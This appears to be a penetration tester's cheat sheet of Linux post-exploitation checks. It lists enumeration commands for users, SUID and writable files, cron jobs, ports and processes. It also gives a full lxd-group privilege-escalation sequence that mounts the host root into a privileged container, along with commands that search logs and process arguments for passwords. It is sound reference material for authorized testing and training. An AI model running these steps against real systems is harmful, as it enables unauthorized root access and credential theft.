Post Exploit Checks

General Enumeration

  • Know if the environment is a real host

ls -la / # check if the root dir has .[dot] files we can know if its a docker env 
  • Know the permissions of the user

sudo -l
  • Know the users

cat /etc/passwd
  • Check for .htaccess file

  • /etc/apache2/sites-enabled/*

  • /etc/nginx/nginx.conf

  • /etc/ssh/sshd_config

  • Application Specific Configs : wp-config, settings.php etc..,

Groups Exploitation


  • The adm group members can view the log files

cd /var/log
grep -EnRi password .



  • The lxd users can create a malicious docker like contents to load the /root of the machine in a containerized environment

# attacker machine
git clone
cd lxd-alpine-builder

# victim machine
lxd init # yes to all 
lxc image import ./alpine-v3.15-x86_64-20220227_1714.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true # Exp Output: Creating ignite
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true # Exp Output: Device mydevice added to ignite
lxc start ignite
lxc exec ignite /bin/sh # shell will be obtained as root in the ignite container
cd /mnt/root # provides the root of the victim machine

Files Enumeration

  • Find suid binaries

find / -perm /4000 -ls 2>/dev/null
  • Find Writeable files

find / -type f -writable 2>/dev/null | grep -v proc
  • Find files owned by the user (group specific)

# ! -path <path> - omits files from the mentioned directory
# -group <group name> - group name
find / -group www-data ! -path "/proc/*" ! -path "/var/www*" 2>/dev/null
  • Locations to check

ls /opt
ls /usr/local/bin
ls ~/.local/bin

Background Jobs Enumeration

  • Crontabs

crontab -l
cat /etc/crontab
  • Enumerate processes with pspy

Network Enumeration

  • Know the network adapters ( might be communicating internally )

ip a
  • Open Ports and services

netstat -antp
# look for unusal services running interally or mysql service 

Process Enumeration

  • Enumerate the services that are running

ps aux
  • Get more information about the process (like the passed arguments etc.., it might contain passwords )

# know the process id from ps aux
cat /proc/<processid>/cmd

Web Directories

  • Check the web directories for passwords



# Connecting to mysql
mysql -u root -p 
# password prompt

mysql> select * from wp_users \G # instead of "select * from wp_users;"

Last updated